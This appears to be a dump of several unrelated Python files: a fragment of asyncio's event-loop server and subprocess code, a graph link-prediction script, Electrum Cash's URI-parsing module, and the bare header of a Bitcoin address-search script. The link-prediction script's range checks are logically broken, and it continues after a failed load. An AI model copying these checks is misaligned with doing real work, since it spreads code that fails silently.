The host parameter can be a string, in that case the TCP server is
bound to host and port.
The host parameter can also be a sequence of strings and in that case
the TCP server is bound to all hosts of the sequence. If a host
appears multiple times (possibly indirectly e.g. when hostnames
resolve to the same IP address), the server is only bound once to that
host.
Return a Server object which can be used to stop the service.
This method is a coroutine.
"""
if isinstance(ssl, bool):
raise TypeError('ssl argument must be an SSLContext or None')
if ssl_handshake_timeout is not None and ssl is None:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
if reuse_address is None:
reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
sockets = []
if host == '':
hosts = [None]
elif (isinstance(host, str) or
not isinstance(host, collections.abc.Iterable)):
hosts = [host]
else:
hosts = host
fs = [self._create_server_getaddrinfo(host, port, family=family,
flags=flags)
for host in hosts]
infos = await tasks.gather(*fs, loop=self)
infos = set(itertools.chain.from_iterable(infos))
completed = False
try:
for res in infos:
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error:
# Assume it's a bad family/type/protocol combination.
if self._debug:
logger.warning('create_server() failed to create '
'socket.socket(%r, %r, %r)',
af, socktype, proto, exc_info=True)
continue
sockets.append(sock)
if reuse_address:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
if reuse_port:
_set_reuseport(sock)
# Disable IPv4/IPv6 dual stack support (enabled by
# default on Linux) which makes a single socket
# listen on both address families.
if (_HAS_IPv6 and
af == socket.AF_INET6 and
hasattr(socket, 'IPPROTO_IPV6')):
sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_V6ONLY,
True)
try:
sock.bind(sa)
except OSError as err:
raise OSError(err.errno, 'error while attempting '
'to bind on address %r: %s'
% (sa, err.strerror.lower())) from None
completed = True
finally:
if not completed:
for sock in sockets:
sock.close()
else:
if sock is None:
raise ValueError('Neither host/port nor sock were specified')
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
sockets = [sock]
for sock in sockets:
sock.setblocking(False)
server = Server(self, sockets, protocol_factory,
ssl, backlog, ssl_handshake_timeout)
if start_serving:
server._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self)
if self._debug:
logger.info("%r is serving", server)
return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None):
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
popen_args = (program,) + args
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
def default_exception_handler(self, context):
"""Default exception handler.
This is called when an exception occurs and no exception
handler is set, and can be called by a custom exception
handler that wants to defer to the default behavior.
This default handler logs the error message and other
context-dependent information. In debug mode, a truncated
stack trace is also appended showing where the given object
(e.g. a handle or future or task) was created, if any.
The context parameter has the same meaning as in
`call_exception_handler()`.
"""
message = context.get('message')
if not message:
message = 'Unhandled exception in event loop'
exception = context.get('exception')
if exception is not None:
exc_info = (type(exception), exception, exception.__traceback__)
else:
exc_info = False
if ('source_traceback' not in context and
self._current_handle is not None and
self._current_handle._source_traceback):
context['handle_traceback'] = \
self._current_handle._source_traceback
log_lines = [message]
for key in sorted(context):
if key in {'message', 'exception'}:
continue
value = context[key]
if key == 'source_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Object created at (most recent call last):\n'
value += tb.rstrip()
elif key == 'handle_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Handle created at (most recent call last):\n'
value += tb.rstrip()
else:
value = repr(value)
log_lines.append(f'{key}: {value}')
logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
"""Call the current event loop's exception handler.
The context argument is a dict containing the following keys:
- 'message': Error message;
- 'exception' (optional): Exception object;
- 'future' (optional): Future instance;
- 'task' (optional): Task instance;
- 'handle' (optional): Handle instance;
- 'protocol' (optional): Protocol instance;
- 'transport' (optional): Transport instance;
- 'socket' (optional): Socket instance;
- 'asyncgen' (optional): Asynchronous generator that caused
the exception.
New keys maybe introduced in the future.
Note: do not overload this method in an event loop subclass.
For custom exception handling, use the
`set_exception_handler()` method.
"""
if self._exception_handler is None:
try:
self.default_exception_handler(context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Second protection layer for unexpected errors
# in the default implementation, as well as for subclassed
# event loops with overloaded "default_exception_handler".
logger.error('Exception in default exception handler',
exc_info=True)
else:
try:
self._exception_handler(self, context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException as exc:
# Exception in the user set custom exception handler.
try:
# Let's try default handler.
self.default_exception_handler({
'message': 'Unhandled error in exception handler',
'exception': exc,
'context': context,
})
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Guard 'default_exception_handler' in case it is
# overloaded.
logger.error('Exception in default exception handler '
'while handling an unexpected error '
'in custom exception handler',
exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
"""Like _add_callback() but called from a signal handler."""
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
"""Run one full iteration of the event loop.
This calls all currently ready callbacks, polls for I/O,
schedules the resulting callbacks, and finally schedules
'call_later' callbacks.
"""
sched_count = len(self._scheduled)
if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
self._timer_cancelled_count / sched_count >
_MIN_CANCELLED_TIMER_HANDLES_FRACTION):
# Remove delayed calls that were cancelled if their number
# is too high
new_scheduled = []
for handle in self._scheduled:
if handle._cancelled:
handle._scheduled = False
else:
new_scheduled.append(handle)
heapq.heapify(new_scheduled)
self._scheduled = new_scheduled
self._timer_cancelled_count = 0
else:
# Remove delayed calls that were cancelled from head of queue.
while self._scheduled and self._scheduled[0]._cancelled:
self._timer_cancelled_count -= 1
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
timeout = None
if self._ready or self._stopping:
timeout = 0
elif self._scheduled:
# Compute the desired timeout.
when = self._scheduled[0]._when
timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
event_list = self._selector.select(timeout)
self._process_events(event_list)
# Handle 'later' callbacks that are ready.
end_time = self.time() + self._clock_resolution
while self._scheduled:
handle = self._scheduled[0]
if handle._when >= end_time:
break
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
self._ready.append(handle)
# This is the only place where callbacks are actually *called*.
# All other places just add them to ready.
# Note: We run all currently scheduled callbacks, but not any
# callbacks scheduled by callbacks run this time around --
# they will be run the next time (after another I/O poll).
# Use an idiom that is thread-safe without using locks.
ntodo = len(self._ready)
for i in range(ntodo):
handle = self._ready.popleft()
if handle._cancelled:
continue
if self._debug:
try:
self._current_handle = handle
t0 = self.time()
handle._run()
dt = self.time() - t0
if dt >= self.slow_callback_duration:
logger.warning('Executing %s took %.3f seconds',
_format_handle(handle), dt)
finally:
self._current_handle = None
else:
handle._run()
handle = None # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
|
compute.py | import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import networkx as nx
import time
import random
from tqdm import tqdm
import argparse
plt.style.use('ggplot')
import multiprocessing as mp
from sklearn.metrics import roc_curve, roc_auc_score, confusion_matrix
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, help='Path of the dataset.')
parser.add_argument('--n_cores', type=int, help='Number of CPU cores to use.')
parser.add_argument('--test_size',type=float, help='Size of the test fold in float')
parser.add_argument('--heur', type=str, choices=['RA','JA','AA','PA'], help='Heuristic to use')
parser.add_argument('--plots', type=str, choices=['YES','NO'], help='Display the plots? Default is just ROC curve')
parser.add_argument('--confusion_mat', type=str, choices=['YES','NO'], help='Whether to compute Confusion Matrix')
parser.add_argument('--thresh_bin', type=float, help='Threshold which binarises the list of scores.')
args = parser.parse_args()
flag = True
if args.n_cores >= mp.cpu_count() or args.n_cores == 0:
print('Invalid number of cores.')
flag = False
if 0.1 < args.test_size > 0.99:
print('Invalid proportion of the test fold.')
flag = False
if 0.1 < args.thresh_bin > 0.99:
print('Invalid value of the binary threshold.')
flag = False
if flag == False:
exit()
print('\nStarting the algorithm...')
print('Parameters:',' '.join(f'{k}={v}' for k, v in vars(args).items()))
# Load a graph into networkX object.
try:
Graph = nx.read_gpickle(args.dataset)
print('Dataset loaded.')
except:
print('Invalid dataset path. Stopping...')
t1 = time.time()
# Fraction of edges you want to remove from the training dataset. Imagine it being like train-test split.
proportion_edges = args.test_size
# Select this fraction of edges from the main graph by sampling from the graph.
edge_subset = random.sample(Graph.edges(), int(proportion_edges * Graph.number_of_edges()))
print('Testing split done.')
train = Graph.copy()
# Remove these edges from the dataset and thus create the training split.
train.remove_edges_from(edge_subset)
print('Training split done.')
# Return non-existent edges from the graph. Convert it to a Pythonic list from NetworkX iterator.
print('\nComputing the list of non-edges.')
list_of_non_edges = nx.non_edges(train)
non_edges = []
for start,end in tqdm(list_of_non_edges):
non_edges.append((start,end))
# Transform the list of non_edges to a dictionary to reduce the algorithm's complexity from O**2 to O,
# as lookup in dictionary is O(1) rather than searching a list O(O**2).
print('\nCasting the test fold to dictionary.')
edge_subset_dict = {}
for x, y in tqdm(edge_subset):
edge_subset_dict.setdefault(x, []).append(y)
# Split the array into N_CORES_TO_USE splits which will be placed into N_CORES_TO_USE cores.
split_arrays = np.array_split(np.array(non_edges), args.n_cores)
print('\nNumber of distinct nodes and edges', train.number_of_nodes(), train.number_of_edges())
print('Number of non existent edges in the graph is', len(non_edges))
# Create multiprocessing-specific structure 'Manager' and 'return_list'
manager = mp.Manager()
return_list = manager.list()
# The algorithm was tested on the following 4 heuristics of Networkx library.
# resource_allocation_index, jaccard_coefficient, adamic_adar_index, preferential_attachment
heuristics = {'RA':nx.resource_allocation_index,
'JA':nx.jaccard_coefficient,
'AA':nx.adamic_adar_index,
'PA':nx.preferential_attachment}
chosen_heur = heuristics[args.heur]
# Function which is executed by each core on each of the splits
# Calculate the predictions using the heuristic
# and evaluate if the predicted key-value pairs are in the test split.
def predict_get_scores(Graph, heur, split, return_list, edge_subset):
predictions = heur(Graph, split)
scores, labels = [],[]
for (start,end,value) in tqdm(predictions):
try:
# Check if the predicted key-value pair is in the test split.
connected_nodes = edge_subset.get(start)
label = end in connected_nodes
except:
# If not in the test subset assign label to False, otherwise True.
label=False
scores.append(value)
labels.append(label)
return_list.append([scores,labels])
# Create the processess which are waiting to be executed.
# Monitor your CPU & RAM usage in a Linux shell by running 'top' command.
starttime = time.time()
processes = [None for i in range(args.n_cores)]
for i in range(args.n_cores):
processes[i] = mp.Process(target=predict_get_scores, args=(train, chosen_heur, split_arrays[i], return_list, edge_subset_dict))
processes[i].start()
# Join the processess.
print('\n')
print('Joining Processess, Performing Computation')
for process in processes:
process.join()
print('\nProcessing done, returning list')
# Return the list of predictions.
y = return_list._getvalue()
print('Computation took {} seconds'.format(time.time() - starttime))
# Convert the array to a numpy array for further numpy routines.
print('Reshaping Predictions')
f = np.array(y, dtype='object')
scores,labels = f.T
scores = np.concatenate(scores, axis=0)
labels = np.concatenate(labels, axis=0)
print('Calculating TPR and FPR')
# Compute False and True positive rate from the list of labels and scores.
fpr, tpr, _ = roc_curve(labels, scores)
# Get AUC of ROC curve.
auc = roc_auc_score(labels, scores)
print('AUC of ROC curve is', auc)
if args.plots == 'YES':
if args.confusion_mat == 'YES':
print('Binarising the predictions with threshold')
# Binarise the predictions with given threshold.
binarised = np.where(np.array(scores) > args.thresh_bin, 1, 0)
# Compute the Confusion Matrix, which can take a lot of time
print('Computing Confusion Matrix')
cm = confusion_matrix(labels, binarised)
print('Plotting...')
# Plot the ROC curve
plt.figure()
sns.lineplot(x=fpr, y=tpr, ci=None)
plt.title("{0} {1} {2} {3}".format('ROC Curve for', chosen_heur.__name__, '- AUC:',str(auc)[:5]))
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.show()
if args.confusion_mat == 'YES':
# Plot the Confusion Matrix
plt.figure()
sns.heatmap(cm, annot=True, fmt='0.1f')
plt.title("{0} {1}".format('Confusion Matrix for', chosen_heur.__name__))
plt.xlabel('Ground Truth')
plt.ylabel('Predicted Values')
plt.show() |
web.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import decimal # Qt 5.12 also exports Decimal, so take the package name
import os
import re
import shutil
import sys
import threading
import urllib
from .address import Address
from . import bitcoin
from . import networks
from .util import format_satoshis_plain, bh2u, bfh, print_error, do_in_main_thread
from . import cashacct
from .i18n import _
DEFAULT_EXPLORER = "Blockchair.com"
mainnet_block_explorers = {
'Bitcoin.com': ('https://explorer.bitcoin.com/bch',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
'Blockchair.com': ('https://blockchair.com/bitcoin-cash',
Address.FMT_CASHADDR,
{'tx': 'transaction', 'addr': 'address', 'block' : 'block'}),
'BTC.com': ('https://bch.btc.com',
Address.FMT_CASHADDR,
{'tx': '', 'addr': '', 'block' : 'block'}),
'ViaBTC.com': ('https://explorer.viawallet.com/bch',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
'BlockExplorer.one': ('https://blockexplorer.one/bch/mainnet',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'blockHash'}),
'oregano.de': ('https://explorer.oregano.de',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
'Blockchain.com': ('https://www.blockchain.com/bch',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block'}),
'Bitcoin Unlimited': ('https://explorer.bitcoinunlimited.info',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
'Loping.net': ('https://bch.loping.net',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}
DEFAULT_EXPLORER_TESTNET = 'Bitcoin.com'
testnet_block_explorers = {
'Bitcoin.com' : ('https://explorer.bitcoin.com/tbch',
Address.FMT_LEGACY, # For some reason testnet expects legacy and fails on bchtest: addresses.
{'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
'BlockExplorer.one': ('https://blockexplorer.one/bch/testnet',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'blockHash'}),
'oregano.de': ('https://testnet-explorer.oregano.de',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
'Blockchain.com': ('https://www.blockchain.com/bch-testnet',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block'}),
'Bitcoin Unlimited': ('https://texplorer.bitcoinunlimited.info',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
'Loping.net': ('https://tbch.loping.net',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}
DEFAULT_EXPLORER_TESTNET4 = 'Loping.net'
testnet4_block_explorers = {
'Loping.net': ('https://tbch4.loping.net',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}
DEFAULT_EXPLORER_SCALENET = 'Loping.net'
scalenet_block_explorers = {
'Loping.net': ('https://sbch.loping.net',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}
DEFAULT_EXPLORER_TAXCOIN = 'The Taxplorer'
taxcoin_block_explorers = {
'The Taxplorer': ('https://taxplorer.loping.net',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}
def BE_info():
if networks.net is networks.TestNet:
return testnet_block_explorers
elif networks.net is networks.TestNet4:
return testnet4_block_explorers
elif networks.net is networks.ScaleNet:
return scalenet_block_explorers
elif networks.net is networks.TaxCoinNet:
return taxcoin_block_explorers
return mainnet_block_explorers
def BE_tuple(config):
infodict = BE_info()
return (infodict.get(BE_from_config(config))
or infodict.get(BE_default_explorer()) # In case block explorer in config is bad/no longer valid
)
def BE_default_explorer():
if networks.net is networks.TestNet:
return DEFAULT_EXPLORER_TESTNET
elif networks.net is networks.TestNet4:
return DEFAULT_EXPLORER_TESTNET4
elif networks.net is networks.ScaleNet:
return DEFAULT_EXPLORER_SCALENET
elif networks.net is networks.TaxCoinNet:
return DEFAULT_EXPLORER_TAXCOIN
return DEFAULT_EXPLORER
def BE_from_config(config):
return config.get('block_explorer', BE_default_explorer())
def BE_URL(config, kind, item):
be_tuple = BE_tuple(config)
if not be_tuple:
return
url_base, addr_fmt, parts = be_tuple
kind_str = parts.get(kind)
if kind_str is None:
return
if kind == 'addr':
assert isinstance(item, Address)
item = item.to_string(addr_fmt)
return "/".join(part for part in (url_base, kind_str, item) if part)
def BE_sorted_list():
return sorted(BE_info())
def _strip_cashacct_str(s: str) -> str:
'''Strips emojis and ';' characters from a cashacct string
of the form name#number[.123]'''
return cashacct.CashAcct.strip_emoji(s).replace(';', '').strip()
def create_URI(addr, amount, message, *, op_return=None, op_return_raw=None, net=None):
is_cashacct = bool(isinstance(addr, str) and cashacct.CashAcct.parse_string(addr))
if not isinstance(addr, Address) and not is_cashacct:
return ""
if op_return is not None and op_return_raw is not None:
raise ValueError('Must specify exactly one of op_return or op_return_hex as kwargs to create_URI')
if is_cashacct:
scheme, path = cashacct.URI_SCHEME, _strip_cashacct_str(addr)
else:
scheme, path = addr.to_URI_components(net=net)
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
if op_return:
query.append(f'op_return={str(op_return)}')
if op_return_raw:
query.append(f'op_return_raw={str(op_return_raw)}')
p = urllib.parse.ParseResult(scheme=scheme,
netloc='', path=path, params='',
query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
def urlencode(s):
''' URL Encode; encodes a url or a uri fragment by %-quoting special chars'''
return urllib.parse.quote(s)
def urldecode(url):
''' Inverse of urlencode '''
return urllib.parse.unquote(url)
def parseable_schemes(net = None) -> tuple:
if net is None:
net = networks.net
return (net.CASHADDR_PREFIX, cashacct.URI_SCHEME)
class ExtraParametersInURIWarning(RuntimeWarning):
''' Raised by parse_URI to indicate the parsing succeeded but that
extra parameters were encountered when parsing.
args[0] is the function return value (dict of parsed args).
args[1:] are the URL parameters that were not understood (unknown params)'''
class DuplicateKeyInURIError(RuntimeError):
''' Raised on duplicate param keys in URI.
args[0] is a translated error message suitable for the UI
args[1:] is the list of duplicate keys. '''
class BadSchemeError(RuntimeError):
''' Raised if the scheme is bad/unknown for a URI. '''
class BadURIParameter(ValueError):
''' Raised if:
- 'amount' is not numeric,
- 'address' is invalid
- bad cashacct string,
- 'time' or 'exp' are not ints
args[0] is the bad argument name e.g. 'amount'
args[1] is the underlying Exception that was raised (if any, may be missing). '''
def parse_URI(uri, on_pr=None, *, net=None, strict=False, on_exc=None):
""" If strict=True, may raise ExtraParametersInURIWarning (see docstring
above).
on_pr - a callable that will run in the context of a daemon thread if this
is a payment request which requires further network processing. A single
argument is passed to the callable, the payment request after being verified
on the network. Note: as stated, this runs in the context of the daemon
thread, unlike on_exc below.
on_exc - (optional) a callable that will be executed in the *main thread*
only in the cases of payment requests and only if they fail to serialize or
deserialize. The callable must take 1 arg, a sys.exc_info() tuple. Note: as
stateed, this runs in the context of the main thread always, unlike on_pr
above.
May raise DuplicateKeyInURIError if duplicate keys were found.
May raise BadSchemeError if unknown scheme.
May raise Exception subclass on other misc. failure.
Returns a dict of uri_param -> value on success """
if net is None:
net = networks.net
if ':' not in uri:
# Test it's valid
Address.from_string(uri, net=net)
return {'address': uri}
u = urllib.parse.urlparse(uri, allow_fragments=False) # allow_fragments=False allows for cashacct:name#number URIs
# The scheme always comes back in lower case
accept_schemes = parseable_schemes(net=net)
if u.scheme not in accept_schemes:
raise BadSchemeError(_("Not a {schemes} URI").format(schemes=str(accept_schemes)))
address = u.path
is_cashacct = u.scheme == cashacct.URI_SCHEME
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query, keep_blank_values=True)
else:
pq = urllib.parse.parse_qs(u.query, keep_blank_values=True)
for k, v in pq.items():
if len(v) != 1:
raise DuplicateKeyInURIError(_('Duplicate key in URI'), k)
out = {k: v[0] for k, v in pq.items()}
if address:
if is_cashacct:
if '%' in address:
# on macOS and perhaps other platforms the '#' character may
# get passed-in as a '%23' if opened from a link or from
# some other source. The below call is safe and won't raise.
address = urldecode(address)
if not cashacct.CashAcct.parse_string(address):
raise BadURIParameter('address', ValueError(_("{acct_name} is not a valid cashacct string").format(acct_name=address)))
address = _strip_cashacct_str(address)
else:
# validate
try: Address.from_string(address, net=net)
except Exception as e: raise BadURIParameter('address', e) from e
out['address'] = address
if 'amount' in out:
try:
am = out['amount']
m = re.match(r'([0-9.]+)X([0-9]{2})', am)
if m:
k = int(m.group(2)) - 8
amount = decimal.Decimal(m.group(1)) * int(pow(10, k))
else:
amount = decimal.Decimal(am) * int(bitcoin.COIN)
out['amount'] = int(amount)
except (ValueError, decimal.InvalidOperation, TypeError) as e:
raise BadURIParameter('amount', e) from e
if strict and 'memo' in out and 'message' in out:
# these two args are equivalent and cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'memo', 'message')
elif 'message' in out:
out['memo'] = out['message']
elif 'memo' in out:
out['message'] = out['memo']
if 'time' in out:
try: out['time'] = int(out['time'])
except ValueError as e: raise BadURIParameter('time', e) from e
if 'exp' in out:
try: out['exp'] = int(out['exp'])
except ValueError as e: raise BadURIParameter('exp', e) from e
if 'sig' in out:
try: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
except Exception as e: raise BadURIParameter('sig', e) from e
if 'op_return_raw' in out and 'op_return' in out:
if strict:
# these two args cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'op_return', 'op_return_raw')
del out['op_return_raw'] # if not strict, just pick 1 and delete the other
if 'op_return_raw' in out:
# validate op_return_raw arg
try: bfh(out['op_return_raw'])
except Exception as e: raise BadURIParameter('op_return_raw', e) from e
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
is_pr = bool(r or (name and sig))
if is_pr and is_cashacct:
raise ValueError(_("'{uri_scheme}' payment requests are not currently supported").format(uri_scheme=cashacct.URI_SCHEME))
if on_pr and is_pr:
def get_payment_request_thread():
from . import paymentrequest as pr
try:
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
except:
''' May happen if the values in the request are such
that they cannot be serialized to a protobuf. '''
einfo = sys.exc_info()
print_error("Error processing payment request:", str(einfo[1]))
if on_exc:
do_in_main_thread(on_exc, einfo)
return
if on_pr:
# FIXME: See about also making this use do_in_main_thread.
# However existing code for Android and/or iOS may not be
# expecting this, so we will leave the original code here where
# it runs in the daemon thread context. :/
on_pr(request)
t = threading.Thread(target=get_payment_request_thread, daemon=True)
t.start()
if strict:
accept_keys = {'r', 'sig', 'name', 'address', 'amount', 'label', 'message', 'memo', 'op_return', 'op_return_raw', 'time', 'exp'}
extra_keys = set(out.keys()) - accept_keys
if extra_keys:
raise ExtraParametersInURIWarning(out, *tuple(extra_keys))
return out
def check_www_dir(rdir):
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
Bitcoin_randomCPU_Divison.py | '''
Made by Mizogg Look for Bitcoin Compressed and Uncompressed 3 bc1 Using iceland2k14 secp256k1 https://github.com/iceland2k14/secp256k1 fastest Python Libary
